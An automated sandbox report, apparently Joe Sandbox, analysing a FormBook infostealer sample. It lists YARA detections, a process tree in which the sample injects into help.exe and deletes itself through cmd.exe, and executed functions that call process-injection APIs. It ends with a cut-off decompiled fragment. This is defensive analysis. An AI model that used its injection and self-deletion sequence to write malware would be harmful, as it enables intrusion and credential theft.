                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:high

                      Chronological Activities

                      Analysis Process: help.exe PID: 5040 Parent PID: 3440

                      General

                      Start time:19:34:06
                      Start date:27/10/2021
                      Path:C:\Windows\SysWOW64\help.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\help.exe
                      Imagebase:0xac0000
                      File size:10240 bytes
                      MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: cmd.exe PID: 6932 Parent PID: 5040

                      General

                      Start time:19:34:12
                      Start date:27/10/2021
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:/c del 'C:\Users\user\Desktop\VJaX7U6LAp.exe'
                      Imagebase:0x2a0000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Chronological Activities

                      Analysis Process: conhost.exe PID: 6244 Parent PID: 6932

                      General

                      Start time:19:34:14
                      Start date:27/10/2021
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff61de10000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Chronological Activities

                      Disassembly

                      Code Analysis

                      Reset < >

                        Analysis Process: VJaX7U6LAp.exe PID: 6316 Parent PID: 5372 VJaX7U6LAp.exeCOMMON

                        Executed Functions

                        Function 00B6E6A0, Relevance: .3, Instructions: 315COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9672149f114fefce115dc1a4b51007da7248eae661a85340dfadba7c759524aa
                        • Instruction ID: 1253f7d06e4b59b4b0c9fd112a419429e3d4909e76a274179a53d1dd6e8e8b89
                        • Opcode Fuzzy Hash: 9672149f114fefce115dc1a4b51007da7248eae661a85340dfadba7c759524aa
                        • Instruction Fuzzy Hash: C01290F5411F46CAE338CF65ECD82893BA1B745328F914308D2612BAF5DBB8158ACF84
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05776C48, Relevance: .2, Instructions: 247COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7078fbcf6a5ec92507b8280df7a9d7a65ebdcb713cf804b61d05b5dce067dbe6
                        • Instruction ID: 722418b3ad2b361347630d66839726d6a8249f0c8cbcfdc5f70fdb1c61372a30
                        • Opcode Fuzzy Hash: 7078fbcf6a5ec92507b8280df7a9d7a65ebdcb713cf804b61d05b5dce067dbe6
                        • Instruction Fuzzy Hash: 70A104B4E016288FDF04CFA9D584AADBBF2BF49304F24C469D418AB349D7709985CF61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00B6E690, Relevance: .2, Instructions: 224COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5fab6ef02c40654eeba5dfb3c6b44349c5776978f1c498a715a6a0897834c07a
                        • Instruction ID: 2de38542720974738f6cc9828c3cacf354cb8a3e967a4b292be2775cbaff335f
                        • Opcode Fuzzy Hash: 5fab6ef02c40654eeba5dfb3c6b44349c5776978f1c498a715a6a0897834c07a
                        • Instruction Fuzzy Hash: E8C1F6B5811B4ACBD728CF65ECC81897BA1BB85328F514319D2616B6F4EFB4148ACF84
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05778A88, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05778CBE
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: dcb063d8c29c102ca5991e7baa7509fe557668022cd79ac6c83a0ff634fca28f
                        • Instruction ID: 2fbe72f6c7cf3457c36c34595992904345501df4de7ac0fc4b783d0563226285
                        • Opcode Fuzzy Hash: dcb063d8c29c102ca5991e7baa7509fe557668022cd79ac6c83a0ff634fca28f
                        • Instruction Fuzzy Hash: 41915971D0022DDFDF10CFA4D884BEDBBB6BB48314F0585A9E809A7290DB749985DF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00B698B0, Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00B69AF6
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: c23ddaf80416bfce9ea23dc08d4259ad0d7f2cb5202ce1234902709d5980354d
                        • Instruction ID: 0d09848d0ec5ac29726c3c1bf2904931ac19d606438d8525e5e22c607f1caf25
                        • Opcode Fuzzy Hash: c23ddaf80416bfce9ea23dc08d4259ad0d7f2cb5202ce1234902709d5980354d
                        • Instruction Fuzzy Hash: 88713470A00B058FDB24DF6AD08179AB7F5FF88714F008A6DD49AD7A40DB39E849CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00B653ED, Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                        Download Yara Rule
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00B654A9
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 353520da38de3a3b6c788d454bd0d340f74285c1e0fbe23b3843f90aad3433b3
                        • Instruction ID: ab65fd52daa67031b7b1ce55a85a15ad45f98bca5074dbba9703b9616f5b5cdc
                        • Opcode Fuzzy Hash: 353520da38de3a3b6c788d454bd0d340f74285c1e0fbe23b3843f90aad3433b3
                        • Instruction Fuzzy Hash: D441F2B1C00618CFDB24DFA9C8847DEBBB5FF48304F20856AD409AB250DB75694ACF91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00B63EC8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00B654A9
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 781c2ca1f99aee49bc56076e9da04c121eeaaaa0c2be01ce42bfa3f021409c20
                        • Instruction ID: 0ec6a632575ee1d3760d0d3a92d1f85f3b444d96fc8faaff46173810b271cf4f
                        • Opcode Fuzzy Hash: 781c2ca1f99aee49bc56076e9da04c121eeaaaa0c2be01ce42bfa3f021409c20
                        • Instruction Fuzzy Hash: 0C41CF71C00618CBDB24DFA9C888BDEBBF9FF48304F248569D409AB251DB75694ACF91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00B65564, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eb45c653d02a5c9bfe4fabef0feda06e0eafd99507223f4b4eafa05e9faedca4
                        • Instruction ID: f513a30d8b201040cfe2d66aea641cee60bf8fb70975b3b2b5f54736e37d3f50
                        • Opcode Fuzzy Hash: eb45c653d02a5c9bfe4fabef0feda06e0eafd99507223f4b4eafa05e9faedca4
                        • Instruction Fuzzy Hash: 1A319A71C04B48CFEB21CFA4C8887DDBBF5AF61308F144599D056AB251DB79A94ACB11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05778800, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                        Download Yara Rule
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05778890
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 3749a20a4683936db467e5c6d37bf8b517a768e4f3ed8ee8b51b403b028664c5
                        • Instruction ID: d1e17a7e8af5d6792ff3a8c7ebefa2b8a0caf2fd407a7fbcd9ab3ae0771a515f
                        • Opcode Fuzzy Hash: 3749a20a4683936db467e5c6d37bf8b517a768e4f3ed8ee8b51b403b028664c5
                        • Instruction Fuzzy Hash: 0E2124719003499FCF10DFA9C884BEEBBF5FF48314F14882AE919A7240D778A954DBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00B6B8F4, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B6BD9E,?,?,?,?,?), ref: 00B6BE5F
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 6082976b11e86e7507b68d6be19f6290c595b72fe2c99b3c4f3812cbe5915133
                        • Instruction ID: 25457de28df9832cea7ec205ad16676694e7d4b1c244dccd564ed494af5710a7
                        • Opcode Fuzzy Hash: 6082976b11e86e7507b68d6be19f6290c595b72fe2c99b3c4f3812cbe5915133
                        • Instruction Fuzzy Hash: 6B21E6B5D00248AFDB10CF99D484ADEBBF8FB48324F14846AE914A7310D379A954CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00B6BDD3, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B6BD9E,?,?,?,?,?), ref: 00B6BE5F
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: ec7bc4c285e03045d3a9b961ca122b821d7d0592e9f6eb33fd3113da860caf16
                        • Instruction ID: 48ee67d0aa704f2dc1193d1d3c39a3d85313f2d96eb8146c96234fd11a61acca
                        • Opcode Fuzzy Hash: ec7bc4c285e03045d3a9b961ca122b821d7d0592e9f6eb33fd3113da860caf16
                        • Instruction Fuzzy Hash: 1321F5B5D00208AFDB10CFA9D484ADEBFF8FB48320F14841AE918A7310D379A955CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05778668, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetThreadContext.KERNELBASE(?,00000000), ref: 057786E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID: ContextThread
                        • String ID:
                        • API String ID: 1591575202-0
                        • Opcode ID: b45d8f4529e32747774bf4637cd8b259ce6252d8f26c345a4a66f1fe95d5b98e
                        • Instruction ID: 3465e251d65c460f174eb84d3a6d96e78d66517de26e47c755b475ee70f334e7
                        • Opcode Fuzzy Hash: b45d8f4529e32747774bf4637cd8b259ce6252d8f26c345a4a66f1fe95d5b98e
                        • Instruction Fuzzy Hash: CD213871D003099FCB10DFAAC484BEEBBF4FF48224F14842AD419A7241DB78A944CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 057788F0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05778970
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: fb54bead485bff9a07da993c4f8c0d0c7677292c24d483c06209f72e755a6042
                        • Instruction ID: b4a85632dc08b4bbcc617362c38a839b6a91cba0d1a74ac79da61c5a6855c075
                        • Opcode Fuzzy Hash: fb54bead485bff9a07da993c4f8c0d0c7677292c24d483c06209f72e755a6042
                        • Instruction Fuzzy Hash: 6E2116B18002499FCF10DFA9C884AEEBBF5FF48354F548829E519A7240D7749954DBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00B69588, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B69B71,00000800,00000000,00000000), ref: 00B69D82
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: c9890d11c5c1340908bb46283665148ccf082fb3dd20727131efb7c44c991a3c
                        • Instruction ID: d78068932684cb082d18eba1f9198df52c2bde05ca227b1b541b53c1da5982d6
                        • Opcode Fuzzy Hash: c9890d11c5c1340908bb46283665148ccf082fb3dd20727131efb7c44c991a3c
                        • Instruction Fuzzy Hash: 7E1126B2D003499FDB10CF9AC444ADEFBF8EB88324F14846EE519A7200C379A945CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05778740, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057787AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 0380f7928e28c3cbd76bdb8855a870260121decd6099b118435805f5defdaa05
                        • Instruction ID: 27c35d57a8ecf2e75c1cc0ea463723f62e8d432ddecf9456369edd205d21f0a4
                        • Opcode Fuzzy Hash: 0380f7928e28c3cbd76bdb8855a870260121decd6099b118435805f5defdaa05
                        • Instruction Fuzzy Hash: 711156718002499FCF10DFA9C844BEFBBF9EB48324F148829E519A7250C775A954CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00B69D1A, Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B69B71,00000800,00000000,00000000), ref: 00B69D82
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 76a9284b757b85a0faaf6c51e96caecdb1248a42a9be77878b4606e4c0e895dd
                        • Instruction ID: 6cd73356ea70bfd3b2d0597f34db2dae03d97232a306383167c0aaed27ce0f40
                        • Opcode Fuzzy Hash: 76a9284b757b85a0faaf6c51e96caecdb1248a42a9be77878b4606e4c0e895dd
                        • Instruction Fuzzy Hash: 5C1104B6D002498FCB10CF9AD444ADEFBF8EB88324F14846ED419A7600C379A945CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0577B78C, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0577BEB9,?,?), ref: 0577C060
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        • Opcode ID: c1a3f2d77d3df42bff3ddc52dbfc27986d190b61b0a186816498c4d0d97f0dbb
                        • Instruction ID: d6185447504550697e672514f09f194b74bcb2fd5b94ccdcd3cdad7621e77eea
                        • Opcode Fuzzy Hash: c1a3f2d77d3df42bff3ddc52dbfc27986d190b61b0a186816498c4d0d97f0dbb
                        • Instruction Fuzzy Hash: 091136B18007098FDB20DF99D444BEEBBF8FB48324F148429D959A7340D378A948CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 057785B8, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: a339cb515f37ed6cdb46419de7638b6577ca00906902a32aa6c3b5dca1d72d75
                        • Instruction ID: 4ef1953c9f0eedd32c6c7479862e76bc9f547c21088f090dd793756b6c06dad8
                        • Opcode Fuzzy Hash: a339cb515f37ed6cdb46419de7638b6577ca00906902a32aa6c3b5dca1d72d75
                        • Instruction Fuzzy Hash: E81136B1D003498FCB10DFAAD4447EFFBF9EB88224F248829D519A7240D775A944CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00B69A90, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00B69AF6
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 375331c99ec7d9e5e20cd501bb7524a96eb25b8f2c7c78f44fb65ce08b0c9b4d
                        • Instruction ID: 8dea78de573b185be402ebc4e302b532fdd4c1263e883a7f52669e8ecc419176
                        • Opcode Fuzzy Hash: 375331c99ec7d9e5e20cd501bb7524a96eb25b8f2c7c78f44fb65ce08b0c9b4d
                        • Instruction Fuzzy Hash: CD11E3B5C006498FDB10CF9AD484BDEFBF8EB88324F14845AD419B7600D379A545CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0577AF38, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,?,?,?), ref: 0577AF95
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: be283a39d687a5434323cfa3745318db6cb2116044221b2d474cbdce6f146b18
                        • Instruction ID: 90c1aff767dfcd0d17c87ae90895a6383f7fcf909607288e52d2c4ea90902130
                        • Opcode Fuzzy Hash: be283a39d687a5434323cfa3745318db6cb2116044221b2d474cbdce6f146b18
                        • Instruction Fuzzy Hash: CD11E5B58003499FDB10CF99D484BDEBBF8FB48324F148419E519A7600D375A954CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00A8D4C4, Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.361935911.0000000000A8D000.00000040.00000001.sdmp, Offset: 00A8D000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ff99547d04c86f5a4e64cc003250b9ac5a81371bee7198201623a66aebd78d6b
                        • Instruction ID: 0bf6cc9491d1f40e11111532a40d9450321db531237377d157f7bf906f1a782f
                        • Opcode Fuzzy Hash: ff99547d04c86f5a4e64cc003250b9ac5a81371bee7198201623a66aebd78d6b
                        • Instruction Fuzzy Hash: 4421F571504240EFDB19EF54D9C0F67BF66FB88328F24896EE8054B286C336D856DBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00A9D01C, Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.361969663.0000000000A9D000.00000040.00000001.sdmp, Offset: 00A9D000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f3eebc6c0605d517663dbb1581ad1ae4484b4877605b180e2dff5ad3920f1b5a
                        • Instruction ID: 2837ca2d4d1c90800377154ef6716118c8dd5d277daa01c8172f11481227c219
                        • Opcode Fuzzy Hash: f3eebc6c0605d517663dbb1581ad1ae4484b4877605b180e2dff5ad3920f1b5a
                        • Instruction Fuzzy Hash: 9221F271604240DFDF14DF64D8C4B16BBA5FB84328F24C96DD84A4B246C33BD896CA61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00A9D006, Relevance: .1, Instructions: 60COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.361969663.0000000000A9D000.00000040.00000001.sdmp, Offset: 00A9D000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1d5128dde9bd452c70e0b8a209fab5eb1d47208c91c27d93e0c54f0a468a49e8
                        • Instruction ID: 578b00f9e9633aa9c5d8a3f7d7e3011dcf0b358b927300ec46ef8f3070de9934
                        • Opcode Fuzzy Hash: 1d5128dde9bd452c70e0b8a209fab5eb1d47208c91c27d93e0c54f0a468a49e8
                        • Instruction Fuzzy Hash: 6921C0755093808FDB02CF20D990B15BFB1EB46314F28C5EAD8498B697C33AD84ACB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00A8D4BF, Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.361935911.0000000000A8D000.00000040.00000001.sdmp, Offset: 00A8D000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 30551dcc8a4cb0210a4d9318dc9655d30371c0ed15fcd75da7c0d89f338b66fa
                        • Instruction ID: 74a6c0a10e6aca37c7f51c324841e1c3c6aca578d5dae534322bcbc4315e5f78
                        • Opcode Fuzzy Hash: 30551dcc8a4cb0210a4d9318dc9655d30371c0ed15fcd75da7c0d89f338b66fa
                        • Instruction Fuzzy Hash: B011E676504280DFCF15DF10D5C4B16BF72FB84324F24C6AAD8454B656C336D85ACBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00A8D731, Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.361935911.0000000000A8D000.00000040.00000001.sdmp, Offset: 00A8D000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e74939ad15a45e1998cf007cf6f5bd58a235114b948dfdef2061911868054920
                        • Instruction ID: 714ce477f7e03690db024c9fba60dee20a3b39a75c981ff9a240779c4c4d36ef
                        • Opcode Fuzzy Hash: e74939ad15a45e1998cf007cf6f5bd58a235114b948dfdef2061911868054920
                        • Instruction Fuzzy Hash: E6018F71404344AEE7106B65CC84BA7FBACEB41328F18895AED085B2C2D3799844CBB1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00A8D730, Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.361935911.0000000000A8D000.00000040.00000001.sdmp, Offset: 00A8D000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d265d3300e31f8e73c665beaeb5b330132d02b1120ff29c780edcec9bdc974c7
                        • Instruction ID: c584779f413f15935be6027beaaf20ab29226c7e5af47ce797024d0a127b2b56
                        • Opcode Fuzzy Hash: d265d3300e31f8e73c665beaeb5b330132d02b1120ff29c780edcec9bdc974c7
                        • Instruction Fuzzy Hash: 69F06D72404284AEEB109F15CCC4BA6FF98EB81734F18C55AED085F282D378AC44CBB1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 00B6CC5C, Relevance: .3, Instructions: 265COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8f6a49281ff3e7ebdde04d5c9ce78b97b0ed4a384644c133947db2d62bc371ff
                        • Instruction ID: 8372541a0263112a041d65e956f2fa03a751dd74060e10b9b38c73c188cf8d93
                        • Opcode Fuzzy Hash: 8f6a49281ff3e7ebdde04d5c9ce78b97b0ed4a384644c133947db2d62bc371ff
                        • Instruction Fuzzy Hash: 5BA15E32E002198FCF15DFB5C8449EEBBF2FF85300B1585BAE805AB261EB35A955CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00145375, Relevance: .2, Instructions: 207COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E00145375(signed int __eax, signed int __ebx, signed int __ecx, intOrPtr* __edx, intOrPtr* __edi, void* __esi) {
				intOrPtr* _t70;
				signed char _t71;
				signed char _t72;
				signed char _t73;
				signed char _t74;
				signed char _t75;
				signed char _t76;
				signed char _t77;
				signed char* _t80;
				signed int _t81;
				signed int _t82;
				intOrPtr* _t83;
				intOrPtr* _t86;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr* _t89;
				signed char _t91;
				intOrPtr* _t92;
				intOrPtr* _t96;
				void* _t97;
				intOrPtr* _t101;
				void* _t103;
				intOrPtr* _t107;
				signed char _t109;
				void* _t110;
				intOrPtr* _t116;
				intOrPtr* _t119;
				intOrPtr* _t120;
				void* _t121;
				void* _t123;
				void* _t126;

				_t116 = __edi;
				_t107 = __edx;
				_t91 = __ebx | __ecx;
				 *(__edi + 0x64003002) =  *(__edi + 0x64003002) | __ecx;
				asm("das");
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax = __ecx;
				asm("adc byte [esp+ecx*2], 0x3");
				 *__eax =  *__eax ^ __eax;
				asm("pushfd");
				asm("das");
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				_t96 =  *__eax;
				asm("adc al, 0x4c");
				_t119 = __esi +  *_t96;
				_t70 = __eax + __edx;
				asm("das");
				 *_t70 =  *_t70 + _t70;
				 *_t70 =  *_t70 + _t70;
				_t71 =  *_t70;
				 *_t71 = _t70;
				if( *_t70 != 0) {
					_push(es);
					 *__edx =  *__edx + __edx;
					 *_t119 =  *_t119 + _t96;
					 *_t71 =  *_t71 ^ _t71;
					 *_t71 =  *_t71 + _t71;
